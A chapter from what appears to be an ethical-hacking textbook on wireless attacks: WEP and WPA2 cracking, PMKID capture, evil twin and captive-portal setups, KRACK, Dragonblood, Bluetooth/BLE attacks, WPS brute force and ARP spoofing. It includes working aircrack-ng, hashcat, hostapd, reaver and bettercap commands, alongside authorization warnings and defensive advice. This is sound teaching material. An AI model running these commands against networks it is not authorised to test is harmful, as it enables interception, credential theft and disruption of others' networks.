Chapter 25: Wireless Network Attacks

Introduction: The Invisible Attack Surface

Wireless networks are everywhere. Every office building, coffee shop, hospital, and home broadcasts radio signals that carry data through the air. Unlike wired networks, where an attacker needs physical access to a network port or cable, wireless signals radiate outward in all directions, often extending well beyond the intended coverage area. An attacker sitting in a parking lot, a neighboring building, or even driving past at moderate speed can interact with wireless networks that were never meant to reach them.

This fundamental characteristic -- the broadcast nature of radio frequency communications -- makes wireless networks an inherently different security challenge from their wired counterparts. The physical security perimeter that organizations carefully construct around their wired infrastructure simply does not apply to wireless. The network's boundary extends as far as the radio signal can travel, and that boundary is invisible, unpredictable, and largely uncontrollable.

The history of wireless security is a history of broken promises. Wired Equivalent Privacy (WEP), the first wireless security protocol, was designed to provide confidentiality equivalent to a wired network. It was comprehensively broken within years of its introduction. Wi-Fi Protected Access (WPA) was rushed out as an interim replacement but also proved vulnerable. WPA2, based on the robust AES-CCMP encryption, held up well for over a decade -- until the KRACK attack in 2017 demonstrated that even WPA2's seemingly sound design contained fundamental flaws. And WPA3, the latest standard designed to address WPA2's shortcomings, was itself subjected to the Dragonblood attacks before widespread adoption even began.

The stakes of wireless insecurity are not theoretical. In 2007, the TJX Companies (parent of TJ Maxx and Marshalls) disclosed that attackers had stolen over 94 million credit and debit card numbers by exploiting WEP-encrypted wireless networks at their retail stores. The attackers had simply parked near the stores and captured wireless traffic, eventually compromising the company's entire payment processing infrastructure. The breach cost TJX hundreds of millions of dollars in settlements, fines, and remediation.

For the ethical hacker, wireless network testing is a critical skill. Organizations often focus their security investments on perimeter firewalls, web application security, and endpoint protection while overlooking the wireless attack surface. A comprehensive penetration test must evaluate wireless security to identify risks that scanning the wired network alone would miss entirely.

Authorized Testing Only: Wireless network testing must only be performed against networks you own or have explicit written authorization to test. Intercepting, capturing, or disrupting wireless communications without authorization is a criminal offense under laws such as the U.S. Computer Fraud and Abuse Act, the UK Computer Misuse Act, and equivalent legislation worldwide. Even passive monitoring of wireless traffic may violate wiretapping laws in some jurisdictions.

Blue Team Perspective: Understanding wireless attacks from the attacker's perspective enables defenders to deploy appropriate countermeasures: robust encryption protocols, wireless intrusion detection systems, rogue access point detection, and comprehensive wireless security policies. The techniques in this chapter should inform your defensive strategy.

25.1 Wireless Security Fundamentals

Before exploring attacks, we must understand the protocols and technologies that underpin wireless security. Each generation of wireless security was designed to address the failures of its predecessor, and understanding this evolution reveals the threat landscape.

25.1.1 The IEEE 802.11 Standard

The IEEE 802.11 family of standards defines wireless local area networking (WLAN) protocols. Key variants include:

Each standard defines the physical layer (how data is modulated onto radio waves) and the MAC layer (how devices share the wireless medium). Security protocols operate at the MAC layer and above.

25.1.2 Wireless Network Architecture

Understanding wireless network components is essential for both attacking and defending:

• Access Point (AP): The wireless equivalent of a network switch port. APs bridge wireless clients to the wired network.
• Station (STA): Any device connecting to a wireless network (laptop, phone, IoT device).
• SSID (Service Set Identifier): The human-readable network name broadcast by access points.
• BSSID (Basic Service Set Identifier): The MAC address of the access point's wireless interface, uniquely identifying each AP.
• Channel: The specific frequency slice used for communication. The 2.4 GHz band has 14 channels (11 in North America), with only 3 non-overlapping (1, 6, 11). The 5 GHz band offers many more non-overlapping channels.
• Beacon Frame: Periodic broadcast (typically every 102.4 ms) announcing the network's presence, SSID, supported rates, and security configuration.
• Association: The process by which a station joins a wireless network. This involves probe requests/responses, authentication, and association.

25.1.3 WEP: Wired Equivalent Privacy (Broken)

WEP was the original 802.11 security protocol, ratified in 1997. It used the RC4 stream cipher with 40-bit or 104-bit keys combined with a 24-bit Initialization Vector (IV).

WEP's fatal flaws include:

• IV reuse: The 24-bit IV space (16.7 million values) is small enough that IVs repeat in busy networks, allowing statistical attacks on the keystream.
• Weak key scheduling: Certain IV values produce predictable key schedule states that leak information about the key. The Fluhrer-Mantin-Shamir (FMS) attack exploits these weak IVs.
• No key management: WEP uses a single static key shared by all users. There is no mechanism for per-user or per-session keys.
• CRC-32 integrity: The CRC-32 checksum used for integrity is not cryptographically secure and can be manipulated without knowing the key.

Modern tools can crack WEP encryption in minutes regardless of key length:

# WEP cracking workflow with aircrack-ng suite
# 1. Put wireless adapter in monitor mode
sudo airmon-ng start wlan0

# 2. Capture packets on the target channel
sudo airodump-ng --channel 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# 3. Generate traffic with ARP replay injection
sudo aireplay-ng --arpreplay -b AA:BB:CC:DD:EE:FF wlan0mon

# 4. Crack the key once enough IVs are captured (~40,000+)
sudo aircrack-ng capture-01.cap

Important Note: WEP should never be used. It provides no meaningful security. If WEP networks are discovered during a wireless assessment, their existence alone is a critical finding. However, WEP is still occasionally found in legacy environments -- particularly in industrial control systems, legacy point-of-sale equipment, and healthcare devices that cannot be upgraded.

25.1.4 WPA/WPA2: Wi-Fi Protected Access

WPA (2003) and WPA2 (2004) addressed WEP's fundamental weaknesses:

WPA (TKIP): An interim solution using the Temporal Key Integrity Protocol (TKIP). TKIP retained the RC4 cipher for hardware compatibility but added per-packet key mixing, a proper message integrity code (Michael MIC), and a sequencing mechanism to prevent replay attacks. TKIP is deprecated and considered weak.

WPA2 (AES-CCMP): The full implementation of IEEE 802.11i, using the AES cipher in Counter Mode with CBC-MAC Protocol (CCMP). WPA2 provides strong confidentiality and integrity.

Both WPA and WPA2 support two authentication modes:

• Personal (PSK): Pre-Shared Key mode, where all users share the same passphrase. The passphrase is combined with the SSID to derive the Pairwise Master Key (PMK) using PBKDF2-SHA1 with 4096 iterations.
• Enterprise (802.1X): Each user authenticates individually using credentials verified by a RADIUS server. This provides per-user keys, centralized authentication, and certificate-based verification.

The WPA2-PSK four-way handshake is the foundation of most WPA2 attacks:

Client                              Access Point
   |                                      |
   |  1. ANonce (AP nonce)                |
   |<-------------------------------------|
   |                                      |
   |  [Client derives PTK from           |
   |   PMK + ANonce + SNonce +            |
   |   MAC addresses]                     |
   |                                      |
   |  2. SNonce + MIC                     |
   |------------------------------------->|
   |                                      |
   |  [AP derives same PTK,              |
   |   verifies MIC]                      |
   |                                      |
   |  3. GTK + MIC (encrypted)           |
   |<-------------------------------------|
   |                                      |
   |  4. ACK                              |
   |------------------------------------->|

Capturing this four-way handshake allows offline dictionary attacks against the PSK, since the attacker can compute candidate PTKs and verify them against the captured MIC.

25.1.5 WPA3: The Latest Standard

WPA3, introduced in 2018, addresses several WPA2 weaknesses:

• Simultaneous Authentication of Equals (SAE): Replaces the PSK four-way handshake with a Dragonfly key exchange (based on elliptic curve cryptography). SAE provides forward secrecy and resistance to offline dictionary attacks.
• Protected Management Frames (PMF): Mandatory in WPA3, preventing deauthentication attacks.
• 192-bit security suite: Optional mode for high-security environments using CNSA (Commercial National Security Algorithm Suite) cryptographic algorithms.
• Enhanced Open (OWE): Provides encryption for open networks without requiring a password, using Opportunistic Wireless Encryption.

Despite these improvements, WPA3 faced early challenges with the Dragonblood vulnerabilities, which we will examine in detail later in this chapter.

25.2 Wireless Reconnaissance and Monitoring

Effective wireless attacks begin with thorough reconnaissance. Understanding what networks exist, their security configurations, connected clients, and signal characteristics informs the attack strategy.

25.2.1 Monitor Mode

Normal wireless adapters operate in "managed mode," connecting to a single network and filtering out all traffic not addressed to them. Monitor mode (sometimes called "rfmon") disables this filtering, allowing the adapter to capture all wireless frames on a channel -- including management frames, control frames, and data frames from any network.

Not all wireless adapters support monitor mode. Popular chipsets for wireless security testing include:

• Realtek RTL8812AU: Dual-band (2.4/5 GHz), good range, widely supported
• Atheros AR9271: 2.4 GHz only, excellent Linux support, very reliable
• MediaTek MT7612U: Dual-band, good performance, newer driver support
• Intel AX210: Modern Wi-Fi 6E chipset, excellent for passive monitoring

# Enable monitor mode
sudo airmon-ng check kill  # Kill interfering processes
sudo airmon-ng start wlan0  # Enable monitor mode

# Verify monitor mode
iwconfig wlan0mon

# Alternative method using iw
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

25.2.2 Passive Reconnaissance

Passive reconnaissance involves listening to wireless traffic without transmitting any packets. This is undetectable by the target network.

# Scan all channels and display discovered networks
sudo airodump-ng wlan0mon

# Focus on a specific channel and BSSID
sudo airodump-ng --channel 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

Airodump-ng displays critical information:

• BSSID: Access point MAC address
• PWR: Signal strength (higher values indicate closer proximity)
• Beacons: Number of beacon frames received
• #Data: Number of data frames captured
• CH: Operating channel
• MB: Maximum supported speed
• ENC: Encryption type (WEP, WPA, WPA2, WPA3, OPN)
• CIPHER: Cipher in use (CCMP, TKIP, WEP)
• AUTH: Authentication method (PSK, MGT for Enterprise)
• ESSID: Network name
• STATION: Client devices and their associated networks

25.2.3 Active Reconnaissance

Active reconnaissance involves transmitting packets to elicit responses from wireless devices. This is more detectable but can reveal hidden networks and additional information.

# Send probe requests to discover hidden networks
sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon

# Discover hidden SSIDs through deauthentication
# When a client reconnects, it reveals the hidden SSID in its probe request

Hidden SSIDs provide no real security. They are trivially discovered when any client connects or reconnects to the network. Relying on SSID hiding as a security measure is a common misconception that should be addressed in assessment reports.

25.2.4 Wireless Site Surveys

Professional wireless assessments often include site surveys that map wireless coverage, identify rogue access points, and assess signal leakage.

Tools for wireless site surveys include:

• Kismet: Comprehensive wireless detector, sniffer, and IDS. Supports 802.11, Bluetooth, and other wireless protocols.
• WiFi Analyzer (mobile apps): Quick visualization of nearby networks, channels, and signal strengths.
• Ekahau/Hamina: Enterprise-grade site survey tools for creating detailed coverage heatmaps.
• Wireshark: Deep packet analysis of captured wireless traffic.

25.3 WPA/WPA2 Cracking

Despite WPA2's strong encryption, the PSK (Pre-Shared Key) mode is vulnerable to offline dictionary attacks if the four-way handshake is captured. This section covers the two primary attack vectors: handshake capture and PMKID attacks.

25.3.1 Handshake Capture via Deauthentication

The most common WPA/WPA2 attack involves capturing the four-way handshake and then performing offline password cracking. The handshake can be captured passively (waiting for a client to connect) or actively (forcing a client to reconnect via deauthentication).

# Step 1: Start monitoring on the target channel
sudo airodump-ng --channel 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

# Step 2: In a separate terminal, send deauthentication frames
# This disconnects a client, forcing them to reconnect
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# -a = target AP BSSID
# -c = target client MAC (omit for broadcast deauth)
# 5 = number of deauth frames

# Step 3: Wait for the handshake capture
# Airodump-ng will display "WPA handshake: AA:BB:CC:DD:EE:FF" when captured

# Step 4: Crack the handshake with a wordlist
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap

# Step 5: Or use hashcat for GPU-accelerated cracking
# First convert the capture to hashcat format
hcxpcapngtool -o hash.hc22000 handshake-01.cap

# Then crack with hashcat
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

The effectiveness of this attack depends entirely on the passphrase strength. An 8-character random passphrase can be cracked relatively quickly with GPU acceleration, while a strong 20+ character passphrase is effectively unbreakable with current technology.

Blue Team Perspective: Defend against handshake-based attacks by implementing strong passphrases (20+ characters, random), using WPA2-Enterprise with certificate-based authentication, deploying Protected Management Frames (802.11w/WPA3) to prevent deauthentication attacks, and monitoring for deauthentication flood events with a wireless IDS.

25.3.2 PMKID Attack

Discovered in 2018 by hashcat developer Jens "atom" Steube, the PMKID attack allows WPA/WPA2 cracking without capturing a full four-way handshake and without deauthenticating any clients.

The PMKID (Pairwise Master Key Identifier) is included in the first message of the four-way handshake (from the AP to the client). It is computed as:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA)

Since the PMK is derived from the passphrase and SSID, an attacker who captures the PMKID can perform an offline dictionary attack without needing a connected client.

# Capture PMKID using hcxdumptool
sudo hcxdumptool -i wlan0mon --enable_status=1 -o capture.pcapng \
    --filterlist_ap=AA:BB:CC:DD:EE:FF --filtermode=2

# Convert to hashcat format
hcxpcapngtool -o pmkid.hc22000 capture.pcapng

# Crack with hashcat
hashcat -m 22000 pmkid.hc22000 wordlist.txt

The PMKID attack is particularly dangerous because: - No client needs to be connected to the network - No deauthentication is required (stealthier) - Only a single frame from the AP is needed - Works against most routers that have roaming features enabled

Not all access points include the PMKID in their messages, but a significant majority do, making this a highly practical attack.

25.3.3 Hashcat Rules and Advanced Cracking

Simple dictionary attacks may fail against moderately strong passphrases. Advanced cracking techniques improve success rates:

# Rule-based attack: Apply transformations to dictionary words
hashcat -m 22000 hash.hc22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rule

# Mask attack: Brute-force with patterns
# Example: 8-character password starting with uppercase, ending with digits
hashcat -m 22000 hash.hc22000 -a 3 ?u?l?l?l?l?d?d?d

# Hybrid attack: Dictionary words with appended characters
hashcat -m 22000 hash.hc22000 -a 6 wordlist.txt ?d?d?d?d

# Prince attack: Combine multiple dictionary words
hashcat -m 22000 hash.hc22000 -a 0 wordlist.txt --prince

Real-world Wi-Fi passphrases often follow predictable patterns: company names with years, common words with simple substitutions, or keyboard patterns. Customized wordlists targeting the specific organization dramatically improve cracking success rates.

25.3.4 WPA2-Enterprise Attacks

WPA2-Enterprise, while significantly more secure than PSK, has its own attack vectors:

Evil Twin with RADIUS: An attacker creates a fake access point mimicking the legitimate network and runs a rogue RADIUS server. When clients connect to the fake AP, their credentials are captured by the rogue RADIUS server.

# Using hostapd-mana for Evil Twin Enterprise attack
# hostapd-mana.conf
interface=wlan1
ssid=CorpWifi
channel=6
hw_mode=g
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP
ieee8021x=1
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/path/to/ca.pem
server_cert=/path/to/server.pem
private_key=/path/to/server.key
mana_wpe=1
mana_eaptype=25  # PEAP

This attack succeeds when clients do not properly validate the RADIUS server's certificate -- a common configuration oversight.

PEAP Credential Relay: Captured PEAP (Protected EAP) credentials can be relayed or cracked offline.

Blue Team Perspective: For WPA2-Enterprise deployments, enforce certificate validation on all client devices through Group Policy or MDM profiles. Use EAP-TLS (certificate-based) rather than PEAP (credential-based) where possible. Monitor for rogue access points that impersonate your corporate SSID.

25.4 Evil Twin and Rogue Access Point Attacks

Evil twin attacks exploit the fundamental trust model of Wi-Fi: clients remember networks by SSID and automatically reconnect to known SSIDs. An attacker who creates an access point with the same SSID as a legitimate network can lure clients into connecting.

25.4.1 Evil Twin Attack Mechanics

The attack follows a general pattern:

1. Reconnaissance: Identify the target network's SSID, BSSID, channel, and security configuration.
2. AP creation: Set up a rogue access point with an identical (or similar) SSID. For open networks, no security is needed. For PSK networks, the attacker needs the PSK (or creates an open clone). For Enterprise networks, a rogue RADIUS server is needed.
3. Client attraction: Deauthenticate clients from the legitimate AP to force reconnection. The rogue AP typically transmits at higher power to be preferred.
4. Traffic interception: Once clients connect to the rogue AP, all their traffic passes through the attacker's system, enabling credential capture, session hijacking, and man-in-the-middle attacks.

25.4.2 Captive Portal Evil Twin

A common variant targets open networks (coffee shops, hotels, airports) by creating a captive portal that captures credentials:

# Using hostapd to create a rogue AP
# hostapd.conf
interface=wlan1
driver=nl80211
ssid=FreeAirportWiFi
hw_mode=g
channel=6
auth_algs=1
wmm_enabled=0

# Start the rogue AP
sudo hostapd hostapd.conf

# Configure DHCP and DNS
sudo dnsmasq -i wlan1 --dhcp-range=10.0.0.10,10.0.0.100,12h \
    --address=/#/10.0.0.1

# Set up iptables for captive portal
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080

# Serve a convincing login page on port 8080 that captures credentials

25.4.3 WiFi Pineapple and Automated Tools

The WiFi Pineapple (by Hak5) is a purpose-built device for wireless auditing that automates many evil twin and man-in-the-middle attacks. It features:

• Automatic open network impersonation (PineAP)
• Client probing and tracking
• Captive portal hosting
• Module ecosystem for various attacks
• Remote management via web interface

While the WiFi Pineapple simplifies attacks, ethical hackers should understand the underlying techniques rather than relying solely on automated tools.

25.4.4 KARMA and Known Network Attacks

KARMA (Karma Attack Radio Masquerading as Access-point) exploits the fact that most devices broadcast probe requests for previously connected networks. A KARMA-enabled AP responds to all probe requests, claiming to be whatever network the client is looking for.

Modern operating systems have implemented mitigations against KARMA (such as not probing for hidden networks and randomizing MAC addresses), but older devices and IoT equipment may still be vulnerable.

Blue Team Perspective: Deploy Wireless Intrusion Prevention Systems (WIPS) that detect rogue access points by monitoring for unauthorized SSIDs, unexpected BSSIDs, and suspicious deauthentication patterns. Configure managed devices to only connect to expected networks and validate certificates for Enterprise networks. Educate users about the risks of connecting to unfamiliar Wi-Fi networks.

25.5 WPA3 and Dragonblood Attacks

WPA3 was designed to address WPA2's vulnerabilities, but its initial implementation contained significant flaws discovered by Mathy Vanhoef and Eyal Ronen in their "Dragonblood" research (2019).

25.5.1 The Dragonfly Handshake (SAE)

WPA3-Personal replaces the PSK four-way handshake with Simultaneous Authentication of Equals (SAE), based on the Dragonfly key exchange. SAE provides:

• Forward secrecy: Compromising the passphrase does not allow decryption of previously captured traffic
• Offline dictionary attack resistance: Unlike WPA2-PSK, where a captured handshake enables unlimited offline guessing, SAE requires online interaction for each password guess
• Protection against passive attacks: The passphrase is never transmitted, even in derived form

The SAE handshake uses a commit-confirm exchange:

Client                              Access Point
   |                                      |
   |  Commit: scalar, element             |
   |------------------------------------->|
   |                                      |
   |  Commit: scalar, element             |
   |<-------------------------------------|
   |                                      |
   |  Confirm: confirm value              |
   |------------------------------------->|
   |                                      |
   |  Confirm: confirm value              |
   |<-------------------------------------|

25.5.2 Dragonblood Vulnerabilities

Despite SAE's theoretical strength, the Dragonblood research revealed several practical vulnerabilities:

Side-Channel Attacks: The password encoding algorithm in SAE uses a hash-to-curve process that leaks timing information. By measuring the time an AP takes to respond to commit messages, an attacker can extract information about the password.

Downgrade Attacks: WPA3's transition mode (which supports both WPA2 and WPA3 clients) can be exploited to force a client to connect using WPA2-PSK instead of WPA3-SAE, enabling traditional handshake capture and offline cracking.

# Dragonblood downgrade attack concept
# 1. Monitor for WPA3-Transition mode networks
# 2. Create a rogue AP advertising only WPA2-PSK with the same SSID
# 3. Deauthenticate clients from the legitimate AP
# 4. Clients may fall back to WPA2-PSK on the rogue AP
# 5. Capture the WPA2 handshake and crack offline

Denial-of-Service: The computational cost of SAE commit message processing can be exploited to overload an access point with forged commit messages, consuming CPU resources and preventing legitimate connections.

Group Downgrade: If an AP supports multiple cryptographic groups for SAE, an attacker can force the use of weaker groups through a downgrade attack.

25.5.3 Mitigations and Current Status

Following the Dragonblood disclosures, the Wi-Fi Alliance updated WPA3 with implementation guidance and mitigations:

• Constant-time implementations of the hash-to-curve algorithm to prevent timing side channels
• Anti-clogging mechanisms to mitigate DoS attacks
• Recommendations against transition mode in high-security environments
• Firmware updates for affected access points

WPA3 with proper implementation remains the most secure wireless protocol available. However, adoption remains gradual, and many environments still rely on WPA2.

25.6 The KRACK Attack: Breaking WPA2

The Key Reinstallation Attack (KRACK), discovered by Mathy Vanhoef in 2017, demonstrated a fundamental flaw in the WPA2 four-way handshake that affected virtually every Wi-Fi device in the world.

25.6.1 How KRACK Works

KRACK exploits a vulnerability in the four-way handshake's message 3 retransmission mechanism. During the handshake:

1. The AP sends message 3 (containing the encrypted Group Temporal Key)
2. The client installs the Pairwise Temporal Key (PTK) and responds with message 4
3. If the AP does not receive message 4 (perhaps due to packet loss), it retransmits message 3
4. The client, receiving a retransmitted message 3, reinstalls the PTK and resets the associated nonce and replay counter

The nonce reset is the critical flaw. In cryptographic protocols, nonces must never be reused with the same key. WPA2 uses AES-CCMP, which employs a nonce as a counter for its CTR mode encryption. Resetting this counter causes nonce reuse, which:

• In AES-CCMP: Allows decryption of packets and forging of packets
• In TKIP: Allows decryption and forging, with the ability to inject arbitrary packets
• In GCMP (used in some WPA2 implementations): Allows full key recovery

25.6.2 KRACK's Impact

The impact of KRACK was unprecedented in wireless security:

• Universal: Every correctly implemented WPA2 client was vulnerable, because the flaw was in the protocol specification, not in specific implementations
• Platform-specific severity: Linux and Android 6.0+ were most severely affected because their wpa_supplicant implementation installed an all-zero encryption key upon reinstallation, making decryption trivial
• Practical exploitation: While the attack required proximity and careful timing, it was demonstrated to be practically exploitable against real devices
• Legacy devices: Many IoT devices, embedded systems, and older equipment could not be easily patched

25.6.3 KRACK Demonstration

# KRACK attack requires specialized tooling
# Vanhoef released krackattacks-scripts for research purposes

# The attack requires:
# 1. A monitor mode adapter to observe the handshake
# 2. A second adapter to perform the channel-based MitM
# 3. The ability to block and replay message 3 of the handshake

# Simplified attack flow:
# 1. Position a MitM between client and AP (using channel manipulation)
# 2. Allow messages 1-3 to pass normally
# 3. Block message 4 from reaching the AP
# 4. AP retransmits message 3
# 5. Client reinstalls the key (resetting nonce)
# 6. Capture and decrypt subsequent traffic using the known nonce state

25.6.4 Post-KRACK Defenses

Blue Team Perspective: KRACK underscored the importance of rapid patch management for wireless infrastructure. Key lessons include:

• Update all wireless clients and access points with patches that prevent key reinstallation
• Monitor for suspicious deauthentication patterns that might indicate KRACK exploitation
• Implement WPA3 where possible, which includes protections against key reinstallation
• Use VPNs or application-layer encryption (HTTPS, TLS) as defense-in-depth, so that even if wireless encryption is compromised, sensitive data remains protected
• Implement 802.11w Protected Management Frames to make MitM positioning more difficult

25.7 Bluetooth and BLE Attacks

While Wi-Fi dominates wireless networking discussions, Bluetooth and Bluetooth Low Energy (BLE) present their own significant attack surface. With billions of Bluetooth-enabled devices worldwide -- from smartphones and headphones to medical devices, smart locks, and industrial sensors -- Bluetooth security is increasingly important.

25.7.1 Bluetooth Architecture

Bluetooth operates in the 2.4 GHz ISM band and uses frequency hopping spread spectrum (FHSS) across 79 channels (classic Bluetooth) or 40 channels (BLE). Key security-relevant concepts include:

• Pairing: The process of establishing a trusted relationship between devices, involving key exchange
• Bonding: Storing pairing keys for future use, enabling automatic reconnection
• Classic vs. BLE: Classic Bluetooth is used for continuous streaming (audio, file transfer). BLE is designed for periodic, low-bandwidth communication (sensors, beacons, wearables)

25.7.2 Bluetooth Attack Techniques

BlueJacking: Sending unsolicited messages to nearby Bluetooth devices. Low-impact, mainly a nuisance, but can be used for social engineering.

BlueSnarfing: Unauthorized access to information on a Bluetooth device through the OBEX protocol. Can expose contacts, calendar entries, emails, and text messages on vulnerable devices.

BlueBorne (2017): A set of vulnerabilities in Bluetooth implementations that allowed remote code execution without pairing on Android, iOS, Windows, and Linux. BlueBorne was significant because: - It required no user interaction - It did not require the target device to be paired or discoverable - It was wormable (could spread from device to device)

KNOB Attack (2019): Key Negotiation of Bluetooth attack, which exploited a flaw in the Bluetooth standard allowing an attacker to reduce the entropy of the encryption key to a single byte, making brute-force decryption trivial.

BIAS Attack (2020): Bluetooth Impersonation AttackS, which allowed an attacker to impersonate a previously paired device by exploiting weaknesses in the Bluetooth authentication procedure.

25.7.3 BLE-Specific Attacks

BLE security has its own unique challenges:

BLE Sniffing: Tools like the Ubertooth One, nRF52840 dongles, and the Sniffle sniffer can capture BLE traffic, including advertising packets and connection data.

# BLE scanning with hcitool and gatttool
sudo hcitool lescan  # Discover BLE devices

# Enumerate services and characteristics
gatttool -b AA:BB:CC:DD:EE:FF --primary  # List services
gatttool -b AA:BB:CC:DD:EE:FF --characteristics  # List characteristics

BLE Relay/Replay Attacks: BLE smart locks and access control devices are vulnerable to relay attacks, where communication between a legitimate user's device and the lock is relayed through an attacker's equipment, extending the effective range. This has been demonstrated against Tesla vehicles, smart locks, and building access systems.

GATTacking: Exploiting improperly configured GATT (Generic Attribute Profile) services to read or write sensitive characteristics on BLE devices without authentication.

BLE Pairing Vulnerabilities: The "Just Works" pairing mode provides no protection against man-in-the-middle attacks. Many consumer devices use this mode by default.

25.7.4 Bluetooth Security Testing Tools

• Ubertooth One: Open-source Bluetooth monitoring hardware
• Bettercap: All-in-one network attack tool with Bluetooth and BLE modules
• Sniffle: Modern BLE sniffer using Texas Instruments CC1352/CC26x2 hardware
• nRF Connect: Mobile app for BLE device exploration
• Btlejack: BLE sniffing, jamming, and hijacking tool
• Bluetooth Security Assessment Methodology (BSAM): NIST-aligned framework for comprehensive Bluetooth security assessment

Blue Team Perspective: Bluetooth security requires both technical controls and policy enforcement. Disable Bluetooth on devices that do not need it. Ensure all Bluetooth devices use current firmware with patches for BlueBorne, KNOB, and BIAS. Implement strong pairing requirements (Numeric Comparison or Passkey Entry rather than Just Works). Monitor for unauthorized Bluetooth devices near sensitive areas. For BLE-enabled access control, implement additional security layers beyond BLE proximity (such as PIN codes or biometrics).

25.7.5 BLE Application Security

Beyond protocol-level attacks, BLE applications frequently contain implementation vulnerabilities that expose sensitive data or enable unauthorized control:

Insecure characteristic permissions: BLE devices expose data through "characteristics" organized in "services." Many IoT devices configure characteristics as readable or writable without authentication, allowing any nearby BLE device to read sensor data, modify configuration settings, or issue control commands. Smart locks, medical devices, and industrial sensors have all been found with unprotected characteristics.

Static and hardcoded keys: Some BLE devices use hardcoded encryption keys or PINs that are identical across all units. Once the key for one device is extracted (through firmware analysis or sniffing the pairing process), all devices of that model are compromised.

Replay attacks: BLE communications that lack sequence numbers or timestamps may be vulnerable to replay attacks. An attacker captures a legitimate command (such as an "unlock" command to a smart lock) and replays it later to achieve the same effect without needing to authenticate.

Firmware extraction over BLE: Many BLE devices support firmware updates over-the-air (OTA). If the firmware update process lacks proper authentication and encryption, an attacker can extract the current firmware (revealing hardcoded secrets, encryption keys, and business logic) or push malicious firmware to the device.

# GATTTool: Read all characteristics from a BLE device
gatttool -b TARGET_MAC --char-read --uuid=0x2a00  # Device Name
gatttool -b TARGET_MAC --characteristics  # List all characteristics

# Bettercap BLE enumeration
sudo bettercap
ble.recon on
ble.enum TARGET_MAC
ble.write TARGET_MAC SERVICE_UUID CHAR_UUID DATA

Testing BLE application security in the MedSecure environment is particularly critical because healthcare IoT devices (patient monitors, infusion pumps, glucose monitors) increasingly use BLE for data transmission and configuration. A vulnerability in a medical BLE device could allow an attacker to read patient data, modify device settings, or inject false readings -- all with potentially life-threatening consequences.

25.8 Advanced Wireless Attacks

Beyond the core attacks on Wi-Fi encryption protocols, several advanced wireless attack techniques deserve attention for their relevance to modern security assessments.

25.8.1 FragAttacks: Wi-Fi Fragmentation and Aggregation Attacks

In 2021, Mathy Vanhoef (the researcher behind KRACK and Dragonblood) disclosed FragAttacks -- a collection of vulnerabilities affecting all Wi-Fi security protocols from WEP through WPA3. These vulnerabilities were unique because some were design flaws in the Wi-Fi standard itself, while others were widespread implementation bugs.

Three design flaws were identified:

• Aggregation attack (CVE-2020-24588): An attacker can abuse frame aggregation to trick a victim into using a specific aggregation policy, enabling injection of arbitrary network frames. The attacker can redirect traffic to a malicious DNS server.

• Mixed key attack (CVE-2020-24587): When fragments are reassembled, the implementation may combine fragments encrypted with different keys, enabling injection of malicious content.

• Fragment cache attack (CVE-2020-24586): Fragments cached from one session can be combined with fragments from a new session, enabling content injection.

Additional implementation bugs included:

• Accepting plaintext frames during encrypted sessions
• Accepting plaintext aggregated frames with the "is aggregated" flag set
• Accepting second (or later) fragments as full frames

These vulnerabilities affected virtually every Wi-Fi device tested, and patches were required from all major vendors. The discovery demonstrated that even after decades of security research, the Wi-Fi standard still contained undiscovered design flaws.

25.8.2 Wi-Fi Direct and P2P Attacks

Wi-Fi Direct allows devices to connect directly without an access point, creating a peer-to-peer connection. This technology is used for screen mirroring (Miracast), file sharing, and printer connections.

Security concerns with Wi-Fi Direct include:

• Automatic group owner negotiation: One device becomes the group owner (effectively an AP), potentially exposing its services
• PIN-based WPS: Many Wi-Fi Direct implementations use WPS for connection setup, which is vulnerable to brute-force attacks
• Persistent groups: Devices may automatically reconnect to previously paired devices without user confirmation
• Service discovery: Wi-Fi Direct service discovery can reveal information about a device's capabilities

25.8.3 WPS (Wi-Fi Protected Setup) Attacks

WPS was designed to simplify the process of connecting devices to WPA/WPA2 networks. The PIN-based WPS mode contains a fundamental design flaw that makes it vulnerable to brute-force attacks:

The 8-digit WPS PIN is validated in two halves: the first 4 digits are validated separately from the last 4 (with the 8th digit being a checksum). This reduces the brute-force space from 100,000,000 to approximately 11,000 attempts.

# WPS PIN brute-force with Reaver
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

# WPS PIN brute-force with Bully (often faster)
sudo bully wlan0mon -b AA:BB:CC:DD:EE:FF -c 6

# Pixie-Dust attack (offline WPS PIN recovery)
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K

The Pixie-Dust attack (discovered in 2014) can recover certain WPS PINs offline by exploiting weak random number generation in some router chipsets. This reduces the attack from hours of online brute-forcing to seconds of offline computation.

Blue Team Perspective: WPS should be disabled on all access points. Many routers have WPS enabled by default, and even when the "disable WPS" option is selected in the web interface, the WPS functionality may remain active. Test with Reaver or Wash to verify that WPS is truly disabled, not just hidden from the management interface.

25.8.4 Wireless Man-in-the-Middle Attacks

Beyond evil twin attacks, several wireless MitM techniques enable traffic interception:

ARP Spoofing on Wireless: Once connected to a wireless network (whether through legitimate means or via PSK cracking), an attacker can perform ARP spoofing to intercept traffic between other wireless clients and the gateway.

# ARP spoofing with arpspoof (dsniff suite)
# Poison the target to think we are the gateway
sudo arpspoof -i wlan0 -t TARGET_IP GATEWAY_IP

# Poison the gateway to think we are the target
sudo arpspoof -i wlan0 -t GATEWAY_IP TARGET_IP

# Or use Bettercap for automated MitM
sudo bettercap -iface wlan0
> net.probe on
> set arp.spoof.targets TARGET_IP
> arp.spoof on
> net.sniff on

